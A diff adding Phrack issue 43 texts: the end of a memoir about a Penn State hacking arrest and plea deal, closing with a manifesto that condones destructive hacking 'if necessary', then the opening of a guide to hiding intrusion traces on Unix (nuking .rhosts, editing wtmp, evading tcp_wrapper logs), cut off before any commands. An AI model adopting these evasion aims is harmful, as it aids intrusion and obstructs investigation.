+could do.  They told me, however, to contact them in the event
+that a trial date was set.
+
+"If you cannot afford an attorney, one will be provided for you."
+This is, perhaps, the biggest lie in the litany of lies
+known as the Miranda rights.  It is the court which prosecutes
+you that decides whether you can afford an attorney, and the same
+court selects that attorney.
+
+Without the formal filing of charges, you can not receive the assistance
+of a public defender.  This is what I was told by the public defender's
+office.  Merely being investigated apparently does not entail the right
+to counsel, regardless of the level of harassment involved in the
+investigation.
+
+We remained in intermittent contact with the police, and called
+every week or so to ask what was happening.  We learned nothing new.
+The only information of any importance I did learn was at a
+party.  Between hand-rolled cigarettes of a sort never sold by
+the R. J. Reynolds' Tobacco Company, I discussed my case.
+
+This might not be the sort of thing one would normally do at a party,
+but if you are busted you will find that the investigation takes a
+central role in your life.  When you are not talking about it, you
+are thinking about it.  When you are not thinking about it, you are
+trying the best you can not to think about it.  It is a cherished belief
+of mine that anyone who survives a police investigation ought to receive
+at least an Associate's degree in Criminal Law; you will learn more about
+the law than you ever wished to know.
+
+The person on my right, when I said that Jeffery Jones was in charge
+of the case, immediately started.  "He was in my high school class,"
+said the man, who sported a handlebar mustache.
+
+"What?  Really?  What's he like?  Is he as much of an asshole in person?"
+I asked.
+
+"He was kind of a weird kid."
+
+"How?  What's he done?  Have you kept in touch?"
+
+"Well, all I really know about him is that he went out to be a cop in
+Austin, but he couldn't take it, had a breakdown or something, and came
+back here."
+
+"I can see that.  He's a fucking psycho."
+
+I gloated over this tidbit of information, and decided that I would
+use it the next time I met the police.
+
+This was to be several weeks.  Though we had given the police our work
+schedules, phone numbers at home, work and play; and informed them when
+they might be likely to locate us at any particular place, we had apparently
+underestimated the nearly limitless incompetence of Penn State's elite
+computer cops.
+
+As he was walking to work one day, Dale saw Jeffery Jones driving
+very slowly and craning his neck in all directions, apparently looking
+for someone.  However, he failed to note the presence of Dale, the only
+person on the street.  Dale wondered whether Jeffery had been looking for
+him.
+
+The next night at the Lab, the telephone rang.  With a series of typical,
+frenzied accusations Jeffery Jones initiated the conversation.  He believed
+that we had been attempting to escape or evade him in some manner.  Wayne
+was on another line, and Dale and I talked from different phones.
+
+"You've been trying to avoid us, haven't you?" Jeffery shouted.
+
+"Where have you been?" asked Wayne.
+
+"We told you where we'd be.  You said you'd be in touch,"  I said.
+
+"We haven't been able to find you," said Wayne.
+
+"Look, you have our goddamn work schedule, our address, our phone
+numbers, and where we usually are.  What the hell else do you need?"
+asked Dale.
+
+"We went to your address.  The guy we talked to didn't know where
+you were,"  said Wayne.
+
+As we discovered later that night, the police had been at our apartment,
+and had knocked on the wrong door, that of our downstairs neighbor,
+a mental patient who had been kicked out of the hospital after Reagan's
+generous revision of the mental health code.  His main activity was
+shouting and threatening to kill people who weren't there, so the
+consternation of the police was not surprising.
+
+"So we weren't there.  You could have called," said Dale.
+
+"I just hope you don't decide to leave the area.  We're going to
+arrest you in a couple of days," said Wayne.
+
+"You've been saying that for the last three months," I said.
+"What's taking so long?"
+
+"The secretary's sick," said Jeffery.
+
+"You ought to get this secretary to a doctor.  She must be
+really goddamn sick, if she can't type up an arrest warrant
+in three months," said Dale.
+
+"Hell, I'll come down and type up the damn thing myself, if
+it's too tough for the people you have down there," I offered.
+
+"No, that won't be necessary," said Wayne.
+
+"Look, when you want to arrest us, just give us a call and we'll
+come down.  Don't pull some dumb cop routine like kicking in the
+door," said Dale.
+
+"Okay," Wayne said.  "Your cooperation will be noted."
+
+"By the way, Jeff, I heard you couldn't hack it in Austin," I said.
+
+Silence followed.
+
+After an awkward silence, Wayne said:  "We'll be in touch."
+
+We said our goodbyes, except for Jeffery, and hung up the phones.
+
+I somewhat regretted the last remark, but was still happy with its
+reception.  It is probably unwise to play Scare-the-Cops, but by
+then I no longer gave a damn.  He was probably dead certain that I
+had found this information, and other tidbits of information I had
+casually mentioned, in some sort of computer database.  His mind
+was too limited to consider the possibility that I had met an old
+high-school chum of his and pumped him for information.
+
+By this time, our fear of the police had diminished, and both of
+us were sick to death of the whole business.  We just hoped that
+whatever was to happen would happen more quickly.
+
+When the police first started threatening to arrest us within days,
+it would send a tremor down my spine.  However, after three months of
+obfuscation, excuses, continued harassment of this nature, my only
+response to this threat was anger and boredom.
+
+At least, upon arrest, we would enter a domain where there were some
+rules of conduct and some certainty.  The Kafkaesque uncertainty and
+arbitrarily redefined rules inherent in a police investigation were
+intolerable.
+
+After another month of delay, the police called us again,
+and we agreed to come in to be arrested at nine o'clock the
+next morning.
+
+It was possible that the police would jail us, but it seemed unlikely.
+Two prominent faculty members had strongly condemned the behavior of
+the police.  The case was also politically-charged, and jailing us
+would likely have resulted in howls of outrage, and perhaps even in
+a civil or criminal suit against Penn State.
+
+Wayne told us that we would have to go to the District Magistrate
+for a preliminary hearing.  Dale said that we would go, but demanded a ride
+there and back.  The police complied.
+
+We were more relieved than worried.  Finally, something was happening.
+
+
+XII.  The Arrest
+
+On a cold and sunny morning we walked into the police station to be
+arrested.  I was curious as to the fingerprinting procedure.  The cops
+were to make three copies of my fingerprints, one for the local police,
+one for the state police, and one for the FBI.
+
+Jeffery was unable to fingerprint me on the first two attempts.
+When he finally succeeded in fingerprinting me, he had to do it again.
+He had incorrectly filled out the form.  Finally, with help
+from Wayne, he was able to fingerprint me.
+
+Dale was more difficult.  Jeffery objected to the softness of Dale's
+fingers, and said that would make it difficult.  The fact that Dale's
+fingers were soft, as he is a pianist more accustomed to smooth
+ivory than plastic, would seem to exonerate him from any charge of
+computer hacking.  However, such a thought never troubled the idyllic
+vacancy of Jeffery's mind.  He was too busy bungling through
+the process of fingerprinting.  Wayne had to help him again.
+
+There was soap and water for washing the ink from our
+fingers.  However, it left the faintest trace of ink on the pads
+of my fingers, and I looked at the marks with awe, realizing that
+I had been, in a way, permanently stigmatized.
+
+However, as poorly as the soap had cleaned my fingers, I thought
+with grim amusement that Jeffery would have much more difficulty
+cleaning the ink from his clothes.
+
+Jeffery did not take the mug shots.  A photographer took them.
+Therefore, it went smoothly.
+
+Finally, Wayne presented me with an arrest warrant affidavit, evidently
+written by Jeffery Jones.  A paragon of incompetence, incapable of
+performing the simplest task without assistance, Jeff had written an
+eighteen-page arrest warrant affidavit which was a marvel of incoherence
+and inaccuracy.  This document, with a list of corrections and emendations,
+will appear in a separate article.
+
+While reading the first five pages of this astounding document, I attempted
+to maintain an air of solemnity.  However, by the sixth page, I was stifling
+giggles.  By the seventh, I was chuckling out loud.  By the eighth page I
+was laughing.  By the ninth page I was laughing loudly, and I finished the
+rest of the document in gales of mirth.  Everyone in the room stared at me
+as if I were insane.  This didn't bother me.  Most of my statements to the
+police resulted in this sort of blank stare.  Even Dale looked as if
+he thought I had cracked, but he understood when he saw his arrest
+warrant affidavit, nearly identical to mine.
+
+I simply was unable to take seriously that I had spent months worrying
+about what kind of a case they had, when their best effort was this
+farrago of absurdities.
+
+They took us to Clifford Yorks, the District Magistrate, in separate
+cars.  This time, we rode in the front seat, and two young recruits
+were our chauffeurs.  Dale asked his driver if he could turn on the
+siren.  The cop was not amused.
+
+The only thing which struck me about Clifford Yorks was
+that he had a remarkably large head.  It appeared as if it
+had been inflated like a beach ball.
+
+The magistrate briefly examined the arrest warrant affidavits,
+nodded his vast head, and released us on our own recognizance,
+in lieu of ten thousand dollars bail.  He seemed somewhat preoccupied.
+We signed the papers and left.  The police offered to give
+us a ride right to our house, but we said we'd settle for being
+dropped off in town.
+
+Being over a month in arrears for rent, we did not like the idea
+of our landlord seeing us arrive in separate police cars; also,
+our address was rather notorious, and other residents would be
+greatly suspicious if they saw us with cops.
+
+An arraignment was scheduled for a date months in the future.
+The waiting game was to resume.
+
+
+XIII.  Legal Counsel
+
+Having been arrested, we were at last eligible for legal counsel.
+We went to the yellow pages and started dialing.  We started with
+the attorneys with colored half-page ads.  Even from those advertising
+"Reasonable Rates," we received figures I will not quote for fear
+of violating obscenity statutes.
+
+Going to the quarter-page ads, then the red-lettered names, then the
+schmucks with nothing but names, we received the same sort of numbers.
+Finally talking to the _pro bono_ attorneys, we found that we were
+entitled to a reduction in rates of almost fifty per cent.
+
+This generosity brought the best price down to around three thousand
+dollars, which was three thousand dollars more than we could afford.
+
+So we contacted the public defender's office.
+
+Friends told me that a five thousand dollar attorney is worse, even,
+than a public defender; and that it takes at least twenty thousand
+to retain an attorney with capable of winning anything but the most
+open-and-shut criminal case.
+
+After a certain amount of bureaucratic runaround, we were assigned two
+attorneys.  One, Deborah Lux, was the Assistant Chief Public Defender;
+the other, Dale's attorney, was Bradley Lunsford, a sharp, young
+attorney who seemed too good to be true.
+
+We discussed the case with our new attorneys, and were told that the
+best action we could take to defend ourselves was to do nothing.
+
+This is true.  Anything we had attempted in our own defense, with
+the exception of contacting the complaining party, had been harmful
+to our case.  Any discussions we had with the police were taped and
+examined for anything incriminating.  A letter to the district
+attorney was ignored entirely.
+
+Do absolutely nothing without legal counsel.  Most legal counsel will
+advise you to do nothing.  Legal counsel has more leverage than you do,
+and can make binding deals with the police.  You can't.
+
+We discussed possible defenses.
+
+As none of the systems into which I had intruded had any sort of warning
+against unauthorized access, this was considered a plausible defense.
+
+The almost exclusive use of 'guest' accounts was also beneficial.
+
+A more technical issue is the Best Evidence rule.  We wondered whether
+a court would allow hardcopy as evidence, when the original document was
+electronic.  As it happens, hardcopy is often admissible due to
+loopholes in this rule, even though hardcopy is highly susceptible to
+falsification by the police; and most electronic mail has no
+built-in authentication to prove identity.
+
+Still, without anything more damaging than electronic mail, a case
+would be very difficult to prosecute.  However, with what almost
+amounted to a taped confession, the chance of a conviction
+was increased.
+
+We went over the arrest warrant affidavit, and my corrections to it,
+with a mixture of amusement and consternation.
+
+"So what do you think of this?" asked Dale.
+
+After a moment of thought, Deb Lux said:  "This is gibberish."
+
+"I just had a case where a guy pumped four bullets into his brother-in-law,
+just because he didn't like him, and the arrest warrant for that was two
+pages long.  One and a half, really," said Brad.
+
+"Does this help us, at all, that this arrest warrant is just demonstrably
+false, that it literally has over a hundred mistakes in it?" I asked.
+
+"Yeah, that could help," said Brad.
+
+We agreed to meet at the arraignment.
+
+
+XIV.  The Stairwells of Justice
+
+The arraignment was a simple procedure, and was over in five minutes.
+Prior to our arraignment, five other people were arraigned on charges
+of varying severity, mainly such heinous crimes as smoking marijuana
+or vandalism.
+
+Dale stepped in front of the desk first.  He was informed of the charges
+against him, asked if he understood them, and that was it.
+
+I stepped up, but when the judge asked me whether I understood the charges,
+I answered that I didn't, and that the charges were incomprehensible
+to a sane human being.  I had hoped for some sort of response, but
+that was it for me, too.
+
+A trial date was set, once again months in advance.
+
+A week before the date arrived, it was once again postponed.
+
+During this week, we were informed that Dale's too good to be true
+attorney, Brad Lunsford, had went over to the District Attorney's
+office.  He was replaced by Dave Crowley, the Chief District Attorney,
+a perpetually bitter, pock-faced older man with the demeanor and
+bearing of an angry accountant.
+
+Crowley refused to consider any of the strategies we had discussed
+at length with Brad and Deb.  Dale was understandably irate at the
+sudden change, as was I, for when Deb and I were attempting to discuss
+the case he would interject rude comments.
+
+Finally, after some particularly snide remark, I told him to fuck
+off, or something similarly pleasant, and left.  Dale and I tried to
+limit our dealings to Deb, and it was Deb who handled both of our
+cases to the end, for which I thank God.
+
+The day arrived.
+
+We dressed quite sharply, Dale in new wool slacks and jacket.  I dressed
+in a new suit as well, and inserted a carnation in my buttonhole as
+a gesture of contempt for the proceedings.
+
+Dale looked so sharp that he was mistaken for an attorney twice.  I
+did not share this distinction, but I looked sharp enough.  I had
+shaved my beard a month previously after an error in trimming,
+so I looked presentable.
+
+We realized that judges base their decisions as much on your appearance
+as on what you say.  We did not intend to say anything, so
+appearance was of utmost importance.
+
+We arrived at about the same time as at least thirty assorted computer
+security professionals, police, witnesses and ancillary court personnel.
+Dhamir Mannai and Richard Devon were there as well, and we exchanged
+greetings.  Richard Devon was optimistic about the outcome, as was
+Dhamir Mannai.  The computer security people gathered into a tight,
+paranoid knot, and Richard Devon and Dhamir Mannai stood about ten
+feet away from them, closer to us than to them.  Robert Owens,
+Angela Thomas, Bryan Jensen, and Dan Ehrlich were there, among others.
+They seemed nervous and ill-at-ease in their attempt at formal dress.
+Occasionally, one or another would glare at us, or at Devon and Mannai.
+I smiled and waved.
+
+A discussion of some sort erupted among the computer security people,
+and a bailiff emerged and requested that they be quiet.  The second time this
+was necessary, he simply told them to shut up, and told them to take
+their discussion to the stairwells.  Dale and I had known of the noise
+policy for some time, and took all attorney-client conferences to the
+stairwells, which were filled at all times with similar conferences.
+It seemed that all the hearings and motions were just ceremonies without
+meaning; all the decisions had been made, hours before, in the stairwells
+of justice.
+
+Finally Deb Lux arrived, with a sheaf of documents, and immediately left,
+saying that she would return shortly.  A little over twenty minutes later,
+she returned to announce that she had struck a deal with Eileen Tucker,
+the Assistant District Attorney.
+
+In light of the garbled nature of the police testimony, the spuriousness
+of the arrest warrant affidavit, the hostility of their main witness,
+Dhamir Mannai, and the difficulty of prosecuting a highly technical case,
+the Office of the District Attorney was understandably reluctant to
+prosecute us.
+
+I was glad not to have to deal with Eileen Tucker, a woman affectionately
+nicknamed by other court officials "The Wicked Witch of the West."
+With her pallid skin, and her face drawn tightly over her skull as
+if she had far too much plastic surgery, this seemed an adequately
+descriptive name, both as to appearance and personality.
+
+The deal was Advanced Rehabilitative Disposition, a pre-trial diversion in
+which you effectively receive probation and a fine, and charges are dismissed,
+leaving you with no criminal record.  This is what first-time
+drunk drivers usually receive.
+
+It is essentially a bribe to get the cops off your back.
+
+The fines were approximately two thousand dollars apiece, with Dale
+arbitrarily receiving a fine two hundred dollars greater than mine.
+
+After a moment of thought, we decided that the fines were too large.
+We turned down the deal, and asked her if she could get anything
+better than that.
+
+After a much shorter conference she returned, announcing
+that the fines had been dropped by about a third.  Still unsatisfied,
+but realizing that the proceedings, trial, jury selection, delays,
+sentencing, motions of discovery and almost limitless writs and
+affidavits and appeals would take several more months, we agreed
+to the deal.  It was preferable to more hellish legal proceedings.
+
+We discussed the deal outside with Richard Devon; Dhamir Mannai had left,
+having pressing engagements both before and after his testimony had
+been scheduled.  We agreed that a trial would probably have resulted
+in an eventual victory, but at what unaffordable cost?  We had no
+resources or time for a prolonged legal battle, and no acceptable
+alternative to a plea-bargain.
+
+
+XV.  The End?  Of Course Not; There Is No End
+
+This, we assumed incorrectly, was the end.  There was still a date
+for sentencing, and papers to be signed.
+
+Nevertheless, this was all a formality, and weeks distant.  There
+was time to prepare for these proceedings.  The hounds of spring
+were on winter's traces.  Dale and I hoped to return to what was
+left of our lives, and to enjoy the summer.
+
+This hope was not to be fulfilled.
+
+For, while entering the Electronic Music Lab one fine spring night,
+Andy Ericson [*], a locally-renowned musician, was halted by the
+University Police outside the window, as he prepared to enter.
+We quickly explained that we were authorized to be present, and
+immediately presented appropriate keys, IDs and other evidence that
+we were authorized to be in the Lab.
+
+Nevertheless, more quickly than could be imagined, the cops grabbed
+Andy and slammed him against a cruiser, frisking him for
+weapons.  They claimed that a person had been sighted carrying a
+firearm on campus, and that they were investigating a call.
+
+No weapons were discovered.  However, a small amount of marijuana
+and a tiny pipe were found on him.  Interestingly, the police log
+in the paper the following day noted the paraphernalia bust, but
+there was no mention of any person carrying a firearm on campus.
+
+Andy, a mathematician pursuing a Master's Degree, was performing
+research in a building classified Secret, and thus required a security
+clearance to enter the area where he performed his research.
+
+His supervisor immediately yanked his security clearance, and
+this greatly jeopardized his chances of completing his thesis.
+
+This is, as with my suspicions of wiretapping, an incident in which
+circumstantial evidence seems to justify my belief that the
+police were, even then, continuing surveillance on my friends and
+on me.  However, as with my wiretapping suspicions, there is
+a maddening lack of substantial evidence to confirm my belief
+beyond a reasonable doubt.
+
+Still, the police continued their series of visits to the Lab, under
+one ruse or another.  Jeffery Jones, one night, threatened to arrest
+Dale for being in the Electronic Music Lab, though he had been informed
+repeatedly that Dale's access was authorized by the School of Music.  Dale
+turned over his keys to Police Services the following day, resenting it
+bitterly.
+
+This, however, was not to be a victory for the cops, but a crushing
+embarrassment.  While their previous actions had remained at least
+within the letter of the law and of university policy, this was
+egregious and obvious harassment, and was very quickly quashed.
+
+Bob Wilkins, the supervisor of the Electronic Music Lab; Burt Fenner,
+head of the Electronic Music division; and the Dean of the College of
+Arts and Architecture immediately drafted letters to the University
+Police objecting to this illegal action; as it is the professors and
+heads of departments who authorize keys, and not the University
+Police.  The keys were returned within three days.
+
+However, Jeffery was to vent his impotent rage in repeated visits to
+the Lab at late hours.  On a subsequent occasion, he again threatened
+to arrest Dale, without providing any reason or justification for it.
+
+The police, Jeffery and others, always had some pretext for these visits,
+but the fact that these visits only occurred when Dale was
+present in the Lab, and that they visited no one else, seems to be
+solid circumstantial evidence that they were more than routine
+checkups.
+
+Once the authorities become interested in you, the file is never
+closed.  Perhaps it will sit in a computer for ten or twenty years.
+Perhaps it will never be accessed again.  However, perhaps some
+day in the distant future the police will be investigating some
+unrelated incident, and will once again note your name.  You were
+in the wrong building, or talked to the wrong person.  Suddenly,
+their long-dormant interest in you has reawakened.  Suddenly, they
+once again want you for questioning.  Suddenly, once again, they
+pull your life out from under you.
+
+This is the way democracies die, not by revolution or coups d'etat,
+not by the flowing of blood in the streets like water, as historical
+novelists so quaintly write.  Democracies die by innumerable papercuts.
+Democracies die by the petty actions of petty bureaucrats who, like
+mosquitoes, each drain their little drop of life's blood until none
+is left.
+
+
+XVI.  Lightning Always Strikes the Same Place Twice
+
+One day, Dale received in the mail a subpoena, which informed him that
+his testimony was required in the upcoming trial of Ron Gere, who
+had moved to Florida.  The cops had charged him with criminal
+conspiracy in the creation of the Huang account at the Engineering
+Computer Lab.
+
+Now, not only was I guilty of being used as a weapon against a
+friend, but also guilty of this further complication, that the
+police were to use a friend of mine as a weapon against yet
+another friend.
+
+It is interesting to note the manner in which the police use
+betrayal, deceit and infamous methods to prosecute crime.
+
+It is especially interesting to note the increased use of
+such methods in the prosecution of crimes with no apparent victim.
+Indeed, in this specific case, the only victim with a demonstrable
+loss testified against the police and for the accused.
+
+Dale resolved to plead the Fifth to any question regarding Ron,
+and to risk contempt of court by doing so, rather than be used
+in this manner.
+
+This was not necessary.  As it happened, Ron was to drive well over
+two thousand miles simply to sign a paper and receive ARD.  The three
+of us commiserated, and then Ron was on his way back to Florida.
+
+
+XVII.  Sentencing
+
+Dale and I reported to the appropriate courtroom for sentencing.  In
+the hall, a young man, shackled and restrained by two police officers,
+was yelling:  "I'm eighteen, and I'm having a very bad day!"  The cops
+didn't bat an eye as they dragged him to the adjoining prison.
+
+We sat.
+
+The presiding judge, the Hon. David C. Grine, surveyed with evident
+disdain a room full of criminals like us.  Deborah Lux was there, once
+again serving as counsel.  David Crowley was mercifully absent.
+
+The judge briefly examined each case before him.  For each case, he announced
+the amount of the fine, the time of probation, and banged his gavel.
+Immediately before he arrived at our case, he looked at a man directly to
+our left.  Instead of delivering the usual ARD sentence, he flashed a
+sadistic grin and said:  "Two years jail."  Dealing marijuana was the crime.
+The man's attorney objected.  The judge said:  "Okay, two years, one
+suspended."  The attorney, another flunky from the public defender's
+office, sat down again.  Two cops immediately dragged the man from the
+courtroom to take him to jail.
+
+I noted that practically everyone in the room was poor,
+and those with whom I spoke were all uneducated.  DUI was the
+most common offense.
+
+Judge Grine came to our case, announced the expected sentence,
+and we reported upstairs to be assigned probation officers.  I was
+disgusted with myself for having agreed to this arrangement, and
+perhaps this was why I was surly with the probation officer, Thomas
+Harmon.  This earned me a visit to a court-appointed psychiatrist,
+to determine if I were mentally disturbed or on drugs.
+
+That I was neither was satisfied by a single interview, and no
+drug-testing was necessary; for which I am grateful, for I would
+have refused any such testing.  Exercising this Fifth Amendment-
+guaranteed right is, of course, in this day considered to be
+an admission of guilt.  The slow destruction of this right began
+with the government policy of "implied consent," by which one
+signs over one's Fifth Amendment rights against self-incrimination
+by having a driver's license, allowing a police officer to pull
+you over and test your breath for any reason or for no reason
+at all.
+
+I later apologized to Thomas Harmon for my rudeness, as he had
+done me no disservice; indeed, a probation officer is, at least,
+in the business of keeping people out of jail instead of putting
+them there; and his behavior was less objectionable than that of
+any other police officer involved in my case.
+
+Very shortly thereafter, realizing that I knew a large number
+of the local police on a first-name basis, I left the area, with the
+stated destination of Indiana.  I spent the next two years travelling,
+with such waypoints as New Orleans, Denver, Seattle and Casper, Wyoming;
+and did not touch a computer for three years, almost having a horror
+of them.
+
+I did not pay my fine in the monthly installments the court demanded.
+I ignored virtually every provision of my probation.  I did not remain
+in touch with my probation officer, almost determined that my absence
+should be noticed.  I did a lot of drugs, determined to obliterate all
+memory of my previous life.  In Seattle, heroin was a drug of choice,
+so I did that for a while.
+
+Finally, I arrived at my stated destination, Indiana, with only about
+three months remaining in my probation, and none of my fines paid.  Dale,
+without my knowledge, called my parents and convinced them to pay the
+fine.
+
+It took me a few days of thought to decide whether or not to accept
+their generous offer; I had not thought of asking them to pay the fine,
+sure that they would not.  Perhaps I had done them a disservice in so
+assuming, but now I had to decide whether to accept their help.
+
+If my fines were not paid, my ARD would be revoked, and a new trial
+date would be set.  I was half determined to return and fight this
+case, still ashamed of having agreed to such a deal under duress.
+However, after discussing it at exhaustive length with everyone I
+knew, I came to the conclusion that to do so would be foolish and quixotic.
+Hell, I thought, Thoreau did the same thing in a similar circumstance;
+why shouldn't I?
+
+I accepted my parents' offer.  Three months later, I received a letter in
+the mail announcing that the case had been dismissed and my records
+expunged, with an annotation to the effect that records would be
+retained only to determine eligibility for any future ARD.  I believe
+this to the same degree in which I believe that the NSA never
+performs surveillance on civilians.  I have my doubts that the FBI
+eliminated all mention of me from their files.  I shall decide after
+I file a Freedom of Information Act request and receive a reply.
+
+I now have a legitimate Internet account and due to my experiences
+with weak encryption am a committed cypherpunk and Clipper Chip
+proposal opponent.
+
+What is the moral to this story?
+
+Even now, when I have had several years to gain distance and perspective,
+there does not seem to be a clear moral; only several pragmatic
+lessons.
+
+I became enamored of my own brilliance, and arrogantly sure that
+my intelligence was invulnerability.  I assumed my own immortality,
+and took a fall.  This was not due to the intelligence of my
+adversaries, for the stupidity of the police was marvellous to
+behold.  It was due to my own belief that I was somehow infallible.
+
+Good intentions are only as good as the precautions taken to ensure
+their effectiveness.
+
+There is always a Public Enemy Number One.  As the public's fickle
+attention strays from the perceived menace of drug use, it will latch
+on to whatever new demon first appears on television.  With the
+growing prevalence of hatchet jobs on hackers in the public media,
+it appears that hackers are to be the new witches.
+
+It is advisable, then, that we avoid behavior which would tend to
+confirm the stereotypes.  For every Emmanuel Goldstein or R. U.
+Sirius in the public eye, there are a dozen Mitnicks and Hesses;
+and, alas, it is the Mitnicks and Hesses who gain the most attention.
+Those who work for the betterment of society are much less interesting
+to the media than malicious vandals or spies.
+
+In addition, it is best to avoid even the appearance of dishonesty
+in hacking, eschewing all personal gain.
+
+Phreaking or hacking for personal gain at the expense of others is
+entirely unacceptable.  Possibly bankrupting a small company through
+excessive telephone fraud is not only morally repugnant, but also puts
+money into the coffers of the monopolistic phone companies that we despise.
+
+The goal of hacking is, and always has been, the desire for full
+disclosure of that information which is unethically and illegally
+hidden by governments and corporations; add to that a dash of
+healthy curiosity and a hint of rage, and you have a solvent capable
+of dissolving the thickest veils of secrecy.  If destructive means
+are necessary, by all means use them; but be sure that you are not
+acting from hatred, but from love.
+
+The desire to destroy is understandable, and I sympathize with it;
+anyone who can not think of a dozen government bodies which would be
+significantly improved by their destruction is probably too
+dumb to hack in the first place.  However, if that destruction merely
+leads to disproportionate government reprisals, then it is not only
+inappropriate but counterproductive.
+
+The secrecy and hoarding of information so common in the hacker
+community mirrors, in many respects, the secrecy and hoarding of
+information by the very government we resist.  The desired result
+is full disclosure.  Thus, the immediate, anonymous broadband
+distribution of material substantiating government and corporate
+wrongdoing is a mandate.
+
+Instead of merely collecting information and distributing it
+privately for personal amusement, it must be sent to newspapers,
+television, electronic media, and any other means of communication
+to ensure both that this information can not be immediately
+suppressed by the confiscation of a few bulletin board systems
+and that our true motives may be discerned from our public and
+visible actions.
+
+Our actions are not, in the wake of Operation Sun-Devil and the
+Clipper Chip proposal, entirely free.  The government has declared
+war on numerous subsections of its own population, and thus has
+defined the terms of the conflict.  The War on Drugs is a notable
+example, and we must ask what sort of a government declares war
+on its own citizens, and act accordingly.
+
+Those of us who stand for liberty must act while we still can.
+
+It is later than we think.
+
+
+             "In Germany they first came for the Communists and
+              I didn't speak up because I wasn't a Communist.
+              Then they came for the Jews, and I didn't speak up
+              because I wasn't a Jew.  Then they came for the
+              trade unionists, and I didn't speak up because I
+              wasn't a trade unionist.  Then they came for the
+              Catholics, and I didn't speak up because I was a
+              Protestant.  Then they came for me--and by that
+              time no one was left to speak up."  Martin Niemoeller
+
+              "They that can give up essential liberty to obtain
+               a litle temporary safety deserver neither
+               liberty nor safety."  Benjamin Franklin
+
+---------
+APPENDIX A
+
+[From cert-clippings]
+
+Date: Sat, 10 Mar 90 00:22:22 GMT
+From: thomas@shire.cs.psu.edu (Angela Marie Thomas)
+Subject: PSU Hackers thwarted
+
+The Daily Collegian  Wednesday, 21 Feb 1990
+
+Unlawful computer use leads to arrests
+ALEX H. LIEBER, Collegian Staff Writer
+
+Two men face charges of unlawful computer use, theft of services in a
+preliminary hearing scheduled for this morning at the Centre County Court of
+Common Pleas in Bellefonte.  Dale Garrison, 111 S. Smith St., and Robert W.
+Clark, 201 Twin Lake Drive, Gettysburg, were arrested Friday in connection with
+illegal use of the University computer system, according to court records.
+Garrison, 36, is charged with the theft of service, unlawful computer use
+and criminal conspiracy.  Clark, 20, is charged with multiple counts of
+unlawful computer use and theft of service.  [...]
+
+Clark, who faces the more serious felony charges, allegedly used two computer
+accounts without authorization from the Center of Academic Computing or the
+Computer Science Department and, while creating two files, erased a file from
+the system.  [...]  When interviewed by University Police Services, Clark
+stated in the police report that the file deleted contained lists of various
+groups under the name of "ETZGREEK."  Clark said the erasure was accidental,
+resulting from an override in the file when he tried to copy it over onto a
+blank file.  According to records, Clark is accused of running up more than
+$1000 in his use of the computer account.  Garrison is accused of running up
+more than $800 of computer time.
+
+Police began to investigate allegations of illegal computer use in November
+when Joe Lambert, head of the university's computer department, told police a
+group of people was accessing University computer accounts and then using those
+accounts to gain access to other computer systems.  Among the systems accessed
+was Internet, a series of computers hooked to computer systems in industry,
+education and the military, according to records.
+
+The alleged illegal use of the accounts was originally investigated by a
+Computer Emergency Response Team at Carnegie-Mellon University, which assists
+other worldwide computer systems in investigating improper computer use.
+
+Matt Crawford, technical contact in the University of Chicago computer
+department discovered someone had been using a computer account from Penn State
+to access the University of Chicago computer system.
+
+
+
+
+ 
\ No newline at end of file
diff --git a/phrack43/14.txt b/phrack43/14.txt
new file mode 100644
index 0000000..f0b9cec
--- /dev/null
+++ b/phrack43/14.txt
@@ -0,0 +1,850 @@
+ 
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Three, File 14 of 27
+
+#!/bin/sh
+# Playing Hide and Seek, Unix style.
+# By Phreak Accident
+#
+# A "how-to" in successfully hiding and removing your electronic footprints
+# while gaining unauthorized access to someone else's computer system (Unix in
+# this case).
+
+
+# Start counting ..
+
+  Hmm.  Sucks don't it? Breaking into a system but only to have your access
+cut off the next day.  Right before you had the chance to download that 2
+megabyte source code file you have been dying to get all year.
+
+  Why was the access cut?  Damn, you forgot to nuke that .rhosts file that
+you left in the root directory.  Or maybe it was the wtmp entries you didn't
+bother to edit.  Or perhaps the tcp_wrapper logs that you didn't bother to
+look for.  Whatever it was, it just screwed your access and perhaps, just
+got you busted.
+
+
+----  Simulated incident report follows:
+
+From: mark@abene.com (Mark Dorkenski)
+Message-Id: <9305282324.AA11445@jail.abene.com>
+To: incident-report@cert.org
+Subject: Cracker Breakin
+Status: RO
+
+To whom it may concern,
+
+   Last night 2 of our machines were penetrated by an unauthorized
+user.  Apparently the cracker (or crackers) involved didn't bother
+to clean up after they left.
+
+   The following are logs generated from the time the break-in
+occurred.
+
+[/usr/adm/wtmp]:
+
+oracle    ttyp1    192.148.8.15     Tue May 11 02:12 - 04:00  (02:12)
+sync      ttyp2    192.148.8.15     Tue May 11 01:47 - 01:47  (00:00)
+robert    console                   Mon May 10 06:00 - 04:15  (22:14)
+reboot    ~                         Mon May 10 05:59
+shutdown  ~                         Sun May  9 11:04
+
+[/usr/adm/messages]:
+
+May  11 02:02:54 abene.com login: 3 LOGIN FAILURES FROM 192.148.8.15
+May  11 02:00:32 abene.com login: 4 LOGIN FAILURES FROM 192.148.8.15
+
+[/usr/adm/pacct]:
+
+ls         -     oracle   ttyp1      0.00 secs Tue May  2 19:37
+cat        -     oracle   ttyp1      0.00 secs Tue May  2 19:37
+ls         -     oracle   ttyp1      0.00 secs Tue May  2 19:37
+ls         -     oracle   ttyp1      0.00 secs Tue May  2 19:37
+rdist      -     root     ttyp1      0.00 secs Tue May  2 19:37
+sh         -     root     ttyp0      0.00 secs Tue May  2 19:37
+ed         -     root     ttyp0      0.00 secs Tue May  2 19:37
+rlogin     -     root     ttyp0      0.00 secs Tue May  2 19:37
+ls         -     root     ttyp0      0.00 secs Tue May  2 19:37
+more       -     root     ttyp0      0.00 secs Tue May  2 19:34
+
+
+We have found and plugged the areas of vulnerability and have restored
+original binaries back to the system.  We have already informed the proper
+authorities of the breakin, including the domain contact at the remote
+host in question.
+
+Can you please relay any information regarding incident reports in our
+area?
+
+
+      Mark Dorkenski
+      Network Operations
+
+----  End of incident report
+
+  Hey, it's human nature to be careless and lazy.  But, when you're a hacker,
+and you're illegally breaking into computer systems this isn't a luxury that
+you can afford.  Your efforts in penetrating have to be exact, concise,
+sharp, witty and skillful.  You have to know when to retreat, run, hide,
+pounce or spy.  Let us put it this way, when you get your feet muddy and
+walk on new carpet without cleaning it up, you're gonna get spanked.
+
+  I can't tell you how many times I've see a hacker break into a system and
+leave their muddy footprints all over the system.  Hell, a quarter of the
